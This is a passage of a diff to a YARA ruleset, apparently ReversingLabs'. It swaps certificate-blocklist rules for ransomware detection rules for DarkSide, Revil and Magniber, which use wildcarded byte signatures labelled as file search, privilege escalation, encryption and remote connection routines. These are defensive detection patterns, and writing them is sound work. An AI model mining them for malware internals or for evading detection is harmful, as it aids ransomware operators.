 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2952-L2968"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "0f46fcfc8ee06756646899450daa254d3e5261bdc5c2339f20d01971608fff7b"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.DarkSide.yara#L1-L94"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "128af9a1b143e4b0928dd2b243e69497be906175f44815cc5703f17cce48ec9d"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "DarkSide"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files_v1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 51 52 56 57 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
+            83 7D ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 04 45 ?? ?? ??
+            ?? 50 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ??
+            ?? FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? E8 ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 8D 85 ??
+            ?? ?? ?? 50 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 8D 9D ?? ??
+            ?? ?? 83 3B ?? 74 ?? 81 3B ?? ?? ?? ?? 74 ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8D 85 ?? ??
+            ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 83 7D ??
+            ?? 74 ?? FF 75 ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 45 ?? 5F 5E 5A 59 5B
+            8B E5 5D C2
+        }
+		$enumerate_drives = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 51 52 56 57 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF 15
+            ?? ?? ?? ?? 8B D8 85 DB 74 ?? C1 EB ?? 8D B5 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 F8
+            ?? 74 ?? 83 F8 ?? 75 ?? 56 E8 ?? ?? ?? ?? 8D 76 ?? 4B 85 DB 75 ?? 5F 5E 5A 59 5B 8B
+            E5 5D C3 55 8B EC 81 EC ?? ?? ?? ?? 53 51 52 56 57 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8
+            ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 45 ?? C7
+            00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4
+            ?? 6A ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
+            ?? 89 45 ?? 83 7D ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 66 A9 ?? ?? 74 ?? 6A ?? 8D 85 ?? ??
+            ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 8D 40 ?? 50 FF 15 ?? ?? ??
+            ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15
+            ?? ?? ?? ?? 85 C0 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5F 5E 5A 59 5B 8B E5 5D C2
+        }
+		$escalate_privileges = {
+            55 8B EC 83 C4 ?? 53 51 52 56 57 8D 45 ?? 50 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 0F
+            85 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 8D 45 ?? 50 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75
+            ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 8D 45 ?? 50
+            FF 75 ?? FF 75 ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 75 ?? AD 8B F8 83
+            7E ?? ?? 74 ?? C7 46 ?? ?? ?? ?? ?? 83 C6 ?? 4F 85 FF 75 ?? 6A ?? 6A ?? 6A ?? FF 75
+            ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5F 5E 5A 59 5B 8B E5 5D C3
+        }
+		$enumerate_netshare = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 51 52 56 57 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF 15
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 7D ?? 8D 45 ?? 50 8D 45 ?? 50 8D 45 ?? 50 6A ??
+            8D 45 ?? 50 6A ?? 57 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 75 ?? 83 7E ?? ?? 75 ?? 68 ??
+            ?? ?? ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D8 C7 03 ?? ?? ?? ?? C7 43 ??
+            ?? ?? ?? ?? C7 43 ?? ?? ?? ?? ?? C7 43 ?? ?? ?? ?? ?? 8D 47 ?? 50 53 FF 15 ?? ?? ??
+            ?? 83 C4 ?? 53 FF 15 ?? ?? ?? ?? FF 36 53 FF 15 ?? ?? ?? ?? 83 C4 ?? 53 E8 ?? ?? ??
+            ?? 53 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 C6 ?? FF 4D ?? 83 7D ?? ?? 75 ??
+            FF 15 ?? ?? ?? ?? 5F 5E 5A 59 5B 8B E5 5D C2
+        }
+		$find_files_v2 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 51 52 56 57 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ??
+            ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D BD
+            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 83 C4 ?? 57 FF 15 ?? ?? ?? ??
+            83 C4 ?? 66 83 7C 47 ?? ?? 74 ?? 66 C7 04 47 ?? ?? 83 C7 ?? C7 04 47 ?? ?? ?? ?? C7
+            44 47 ?? ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 85 ?? ?? ?? ??
+            50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 66 A9 ?? ?? 74 ??
+            8D 9D ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 83 C4
+            ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 83 C4 ?? 83 C0 ?? 53 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 56
+            E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 75 ??
+            FF 15 ?? ?? ?? ?? 5F 5E 5A 59 5B 8B E5 5D C2
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MIKL LIMITED" and pe.signatures [ i ] . serial == "3d:25:80:e8:95:26:f7:85:2b:57:06:54:ef:d9:a8:bf" and 1529888400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( $find_files_v1 and $enumerate_drives and $escalate_privileges ) or ( $find_files_v2 and $enumerate_netshare ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_0Fffe432A53Ff03B9223F88Be1B83D9D : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Revil : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing BabyShark malware."
+		description = "Yara rule that detects Revil ransomware."
 		author = "ReversingLabs"
-		id = "25a4c68b-5774-51a2-9aba-1326c85a5251"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "67c2f49e-b9dc-5900-a89d-49ba41088ac3"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2970-L2986"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "e7dbe6b95877f9473661ccf26fa6e5142147609adfe0a9bb8b493875325710af"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Revil.yara#L1-L101"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "24a79477eb797d7a7121d1248ebbece833ccd256de55729ff96084135ce8d426"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Revil"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$search_files = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 8B 75 ?? 33 C0 57 8B 7D ?? 8B D8 50 56 89 45 ?? 89
+            5D ?? 89 45 ?? 89 45 ?? FF 57 ?? 59 59 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 56 50 E8 ??
+            ?? ?? ?? 53 56 FF 77 ?? FF 57 ?? 83 C4 ?? 01 47 ?? 11 57 ?? E9 ?? ?? ?? ?? 8B 45 ??
+            0B 45 ?? 74 ?? FF 33 56 E8 ?? ?? ?? ?? 8B F3 8B 5B ?? 89 5D ?? FF 36 E8 ?? ?? ?? ??
+            56 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 8B 4D ?? 83 C0 ?? 89 45 ?? 83 D1 ?? 0B C1 89 4D
+            ?? 75 ?? 21 45 ?? 8B 75 ?? 33 C0 40 85 C0 0F 84 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? C7 04
+            24 ?? ?? ?? ?? 56 89 45 ?? E8 ?? ?? ?? ?? 59 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ??
+            ?? ?? 89 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ??
+            ?? ?? ?? 59 59 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 59 59 85 C0 0F 84 ?? ?? ?? ?? F7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? 50 8B 45 ?? 8D 04 46 50 E8 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 59 59
+            74 ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 57 ?? 83 C4 ?? 85
+            C0 74 ?? 8D 45 ?? 56 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 77 ?? FF 57 ?? 83
+            C4 ?? 01 47 ?? 11 57 ?? EB ?? 8B 85 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 50 89 45 ?? 8D 85
+            ?? ?? ?? ?? 53 50 56 FF 57 ?? 83 C4 ?? 85 C0 74 ?? FF 75 ?? 8D 85 ?? ?? ?? ?? 53 50
+            56 FF 77 ?? FF 57 ?? 83 C4 ?? 01 47 ?? 11 57 ?? 83 3F ?? 75 ?? 8D 85 ?? ?? ?? ?? 50
+            FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B 5D
+            ?? 83 3F ?? 0F 84 ?? ?? ?? ?? EB ?? 8B F3 8B 5B ?? FF 36 E8 ?? ?? ?? ?? 56 E8 ?? ??
+            ?? ?? 59 59 85 DB 75 ?? 5F 5E 5B 8B E5 5D C3
+        }
+		$remote_connection = {
+            55 8B EC 81 EC ?? ?? ?? ?? 56 57 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 68 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 F6 33 C0 66 89 85 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 56 56 56 56 50 FF 15 ?? ?? ?? ?? 8B F8 33 C0 89 7D ?? 85 FF 0F 84 ?? ??
+            ?? ?? 66 89 45 ?? 33 C9 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 56 56 FF 75 ?? 41 89 75 ??
+            89 75 ?? 89 75 ?? 89 75 ?? 89 4D ?? 89 75 ?? 89 75 ?? 89 75 ?? 89 75 ?? 89 75 ?? 89
+            4D ?? 89 75 ?? 89 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 57 FF 15 ?? ?? ?? ?? 33 C0 E9
+            ?? ?? ?? ?? 8B 4D ?? 33 D2 8B 45 ?? 53 56 66 89 14 41 FF 75 ?? FF 75 ?? 57 FF 15 ??
+            ?? ?? ?? 8B D8 89 5D ?? 85 DB 75 ?? 57 EB ?? 8B 45 ?? 66 39 30 75 ?? 6A ?? 59 66 89
+            08 8D 45 ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33
+            C0 83 7D ?? ?? B9 ?? ?? ?? ?? 66 89 45 ?? 0F 44 C1 0D ?? ?? ?? ?? 50 56 56 56 FF 75
+            ?? 8D 45 ?? 50 53 FF 15 ?? ?? ?? ?? 8B D8 85 DB 75 ?? 57 FF 15 ?? ?? ?? ?? FF 75 ??
+            FF 15 ?? ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B FE 50 6A ?? 6A ?? 68 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 45 ?? 56 FF 75 ?? 8D 85
+            ?? ?? ?? ?? FF 75 ?? FF 75 ?? 6A ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 75 ?? E8 ?? ?? ??
+            ?? 3D ?? ?? ?? ?? 75 ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 6A ?? 53 FF 15 ?? ??
+            ?? ?? 85 C0 6A ?? 58 0F 45 F8 85 FF 75 ?? 8B 45 ?? 56 53 89 30 FF 15 ?? ?? ?? ?? 8B
+            7D ?? 85 C0 74 ?? 56 8D 45 ?? 89 75 ?? 50 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 56 68 ??
+            ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 4D ?? F7 D8 1B C0 23 45 ?? 89 01 3D ?? ?? ?? ?? 75
+            ?? FF 75 ?? 53 E8 ?? ?? ?? ?? 59 59 8B F0 57 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ??
+            ?? ?? 53 FF 15 ?? ?? ?? ?? 8B C6 5B 5F 5E 8B E5 5D C3
+        }
+		$encrypt_files = {
+            55 8B EC 51 83 7D ?? ?? 53 56 57 BB ?? ?? ?? ?? 7F ?? 7C ?? 39 5D ?? 73 ?? 8B 5D ??
+            8B 7D ?? 8D 83 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 59 59 EB ?? E8 ?? ?? ?? ?? 83 F8 ??
+            75 ?? 6A ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 85
+            F6 74 ?? 89 9E ?? ?? ?? ?? 8B 5D ?? C7 45 ?? ?? ?? ?? ?? EB ?? 33 C0 EB ?? E8 ?? ??
+            ?? ?? 8B 55 ?? 8B CA 4A 89 55 ?? 85 C9 74 ?? 83 F8 ?? 75 ?? 53 FF 15 ?? ?? ?? ?? 83
+            F8 ?? 74 ?? A8 ?? 74 ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 6A ??
+            68 ?? ?? ?? ?? FF 75 ?? FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 56 E8 ??
+            ?? ?? ?? 8B C6 59 5F 5E 5B 8B E5 5D C3 56 57 E8 ?? ?? ?? ?? 59 33 C0 EB
+        }
+		$enum_resources = {
+            55 8B EC 83 EC ?? 8D 45 ?? 50 FF 75 ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 74
+            ?? 33 C0 E9 ?? ?? ?? ?? 83 4D ?? ?? B8 ?? ?? ?? ?? 57 50 89 45 ?? E8 ?? ?? ?? ?? 8B
+            F8 59 85 FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 33 C0 EB ?? 53 56 8D 45 ?? 50 57 8D 45
+            ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 75 ?? 33 DB 39 5D ?? 76 ?? 8D 77 ??
+            83 7E ?? ?? 75 ?? FF 75 ?? FF 36 E8 ?? ?? ?? ?? 59 59 F6 46 ?? ?? 74 ?? 8D 46 ?? 50
+            FF 75 ?? E8 ?? ?? ?? ?? 59 59 43 83 C6 ?? 3B 5D ?? 72 ?? 8B 45 ?? 3D ?? ?? ?? ?? 75
+            ?? 57 E8 ?? ?? ?? ?? 59 FF 75 ?? FF 15 ?? ?? ?? ?? F7 D8 5E 1B C0 40 5B 5F 8B E5 5D
+            C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "EGIS Co., Ltd." and pe.signatures [ i ] . serial == "0f:ff:e4:32:a5:3f:f0:3b:92:23:f8:8b:e1:b8:3d:9d" and 1498524050 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $enum_resources ) and ( $search_files ) and ( $encrypt_files ) and ( $remote_connection )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_832E161Aea5206D815F973E5A1Feb3E7 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Magniber : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing SeedLocker ransomware."
+		description = "Yara rule that detects Magniber ransomware."
 		author = "ReversingLabs"
-		id = "ecaa250b-d4ac-5cc9-9e5e-5d6f45db18ad"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "07b6c938-aa25-5ff6-95d2-9e0f84c41b41"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2988-L3006"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "da908de031c78aa012809988e44dea564d32b88b65a2010925c1af85d578a68a"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Magniber.yara#L1-L114"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "05b516f9b466489ea3a30e2fe5eb08290e85ece7a63e29e8bbbeb81c87d0a6f1"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Magniber"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$remote_connection = {
+            E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 55
+            ?? 52 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF
+            15 ?? ?? ?? ?? 8B 55 ?? 52 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D
+            8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 55 ?? 52 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
+            ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 89 45 ?? 6A ?? 6A ?? 6A ?? 6A ??
+            8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 6A
+            ?? 8D 45 ?? 50 8D 4D ?? 51 68 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 83 7D ?? ??
+            74 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 33 C0 E9 ?? ?? ??
+            ?? 8B 55 ?? 83 C2 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D
+            ?? ?? 75 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 33 C0 EB ??
+            C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ??
+            ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF 15
+        }
+		$encrypt_files_1 = {
+            55 8B EC 83 EC ?? 56 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
+            C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
+            C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ??
+            ?? ?? ?? 89 45 ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 8B 55 ?? 03 55 ?? 8D 44 12
+            ?? 50 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? EB
+            ?? 8B 4D ?? 83 C1 ?? 89 4D ?? 8B 55 ?? 3B 55 ?? 7D ?? 8B 45 ?? 8B 4D ?? 8B 55 ?? 8B
+            75 ?? 66 8B 14 56 66 89 14 41 EB ?? B8 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 66 89 04 4A C7
+            45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 4D ?? 3B 4D ?? 7D ?? 8B 55 ??
+            03 55 ?? 8B 45 ?? 8B 4D ?? 8B 75 ?? 66 8B 0C 4E 66 89 4C 50 ?? EB ?? 8B 55 ?? 03 55
+            ?? 33 C0 8B 4D ?? 66 89 44 51 ?? 8D 55 ?? 52 8D 45 ?? 50 8D 4D ?? 51 8B 55 ?? 52 8B
+        }
+		$encrypt_files_2 = {
+            45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 68 ??
+            ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 83
+            7D ?? ?? 75 ?? 33 C0 E9 ?? ?? ?? ?? 8D 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0
+            75 ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ??
+            6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84
+            ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? 50 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 45
+            ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 66 0F 57 C0 66 0F 13 45 ?? 6A ?? 8D 4D ?? 51 6A ??
+            8B 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 99 8B 4D ??
+            2B 4D ?? 8B 75 ?? 1B 75 ?? 89 45 ?? 89 55 ?? 89 4D ?? 89 75 ?? 8B 55 ?? 3B 55 ?? 7C
+            ?? 7F ?? 8B 45 ?? 3B 45 ?? 76 ?? 8B 4D ?? 2B 4D ?? 8B 55 ?? 1B 55 ?? 89 4D ?? 89 55
+            ?? EB ?? 8B 45 ?? 99 89 45 ?? 89 55 ?? 6A ?? 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B
+        }
+		$encrypt_files_3 = {
+            45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 33 C0 E9 ?? ?? ?? ?? 83 7D ??
+            ?? 75 ?? E9 ?? ?? ?? ?? 8B 4D ?? 3B 4D ?? 73 ?? C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 89 55
+            ?? 8B 45 ?? 50 8D 4D ?? 51 6A ?? 6A ?? 8B 55 ?? 52 6A ?? 8B 45 ?? 50 FF 15 ?? ?? ??
+            ?? 89 45 ?? 83 7D ?? ?? 74 ?? 8B 4D ?? 51 8D 55 ?? 52 8B 45 ?? 50 6A ?? 8B 4D ?? 51
+            6A ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45
+            ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? EB ??
+            E9 ?? ?? ?? ?? 8B 45 ?? 50 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 7D ?? ??
+            74 ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ??
+            83 7D ?? ?? 74 ?? 6A ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8D 4D ?? 51 8B 55 ?? 52 FF 15
+            ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 3B 45 ?? 7C ?? 7F ?? 8B 4D ?? 3B 4D ??
+            76 ?? 83 7D ?? ?? 74 ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ??
+            8B 4D ?? 51 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ??
+            83 C4 ?? B8 ?? ?? ?? ?? EB
+        }
+		$search_files = {
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
